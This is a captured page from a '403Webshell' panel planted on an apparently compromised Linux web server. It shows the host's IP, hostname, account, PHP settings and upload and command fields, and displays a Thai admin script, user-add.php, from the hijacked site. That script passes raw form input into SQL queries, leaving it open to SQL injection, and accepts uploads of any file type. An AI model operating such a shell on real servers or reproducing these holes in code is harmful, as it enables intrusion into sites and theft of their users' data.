403Webshell
Server IP : 43.241.58.20  /  Your IP : 216.73.216.25
Web Server : Apache/2
System : Linux ns1-1556229.dragonhispeed.com 3.16.0 #1 SMP Fri Mar 29 22:50:14 MSK 2024 x86_64
User : ratsitne ( 1130)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/ratsitne/.trash/files/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/ratsitne/.trash/files/admin/user-add.php
<?php
include '../config.php';
include 'auth.php';
$page_title = 'เพิ่มผู้ใช้';
ob_start();

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $username = $_POST['username'];
    $password = password_hash($_POST['password'], PASSWORD_BCRYPT);
    $email = $_POST['email'];
    $fullname = $_POST['fullname'];
    $created_at = date('Y-m-d H:i:s');

    // Check for duplicate username
    $username_check_query = "SELECT id FROM users WHERE username = '$username'";
    $username_check_result = mysqli_query($conn, $username_check_query);
    if (mysqli_num_rows($username_check_result) > 0) {
        $_SESSION['error_message'] = 'Username นี้มีอยู่ในระบบแล้ว';
    }

    // Check for duplicate email
    $email_check_query = "SELECT id FROM users WHERE email = '$email'";
    $email_check_result = mysqli_query($conn, $email_check_query);
    if (mysqli_num_rows($email_check_result) > 0) {
        $_SESSION['error_message'] = 'Email นี้มีอยู่ในระบบแล้ว';
    }

    if (!isset($_SESSION['error_message'])) {
        // Handle image upload
        $profile_image = '';
        if (isset($_FILES['profile_image']) && $_FILES['profile_image']['error'] == 0) {
            $target_dir = "../uploads/images/";
            $file_extension = pathinfo($_FILES["profile_image"]["name"], PATHINFO_EXTENSION);
            $unique_file_name = 'user_' . date('YmdHis') . rand(1000, 9999) . '.' . $file_extension;
            $target_file = $target_dir . $unique_file_name;
            if (move_uploaded_file($_FILES["profile_image"]["tmp_name"], $target_file)) {
                $profile_image = $unique_file_name;
            }
        }

        $query = "INSERT INTO users (username, password, email, fullname, profile_image, created_at) VALUES ('$username', '$password', '$email', '$fullname', '$profile_image', '$created_at')";
        if (mysqli_query($conn, $query)) {
            $_SESSION['success_message'] = 'เพิ่มข้อมูลผู้ใช้เรียบร้อยแล้ว';
            header('Location: ' . $admin_url . '/user-list.php');
            exit;
        } else {
            $_SESSION['error_message'] = 'เกิดข้อผิดพลาด: ' . mysqli_error($conn);
        }
    }
}
?>
<form method="POST" enctype="multipart/form-data">
    <div class="card">
        <div class="card-header">
            <h3 class="card-title">เพิ่มผู้ใช้</h3>
        </div>
        <div class="card-body">
            <?php if (isset($_SESSION['error_message'])): ?>
                <div class="alert alert-danger alert-dismissible fade show">
                    <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
                    <i class="bi bi-exclamation-triangle me-1"></i>
                    <?php echo $_SESSION['error_message']; unset($_SESSION['error_message']); ?>
                </div>
            <?php endif; ?>
            <?php if (isset($_SESSION['success_message'])): ?>
                <div class="alert alert-success alert-dismissible fade show">
                    <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
                    <i class="bi bi-check-circle me-1"></i>
                    <?php echo $_SESSION['success_message']; unset($_SESSION['success_message']); ?>
                </div>
            <?php endif; ?>
            <div class="form-group">
                <label for="username">username</label>
                <input type="text" name="username" id="username" class="form-control" required>
            </div>
            <div class="form-group">
                <label for="password">password</label>
                <input type="password" name="password" id="password" class="form-control" required>
            </div>
            <div class="form-group">
                <label for="email">อีเมล์</label>
                <input type="email" name="email" id="email" class="form-control" required>
            </div>
            <div class="form-group">
                <label for="fullname">ชื่อ</label>
                <input type="text" name="fullname" id="fullname" class="form-control" required>
            </div>
            <div class="form-group">
                <label for="profile_image">รูปภาพ</label>
                <input type="file" name="profile_image" id="profile_image" class="form-control">
            </div>
        </div>
        <div class="card-footer">
            <button type="submit" class="btn btn-primary"><i class="bi bi-floppy me-1"></i>บันทึกข้อมูล</button>
            <a href="<?php echo $admin_url . '/user-list.php'; ?>" class='btn btn-secondary'>ย้อนกลับ</a>
        </div>
    </div>
</form>
<?php
$content = ob_get_clean();
$js_script = '';
include 'template_master.php';
?>

Youez - 2016 - github.com/yon3zu
LinuXploit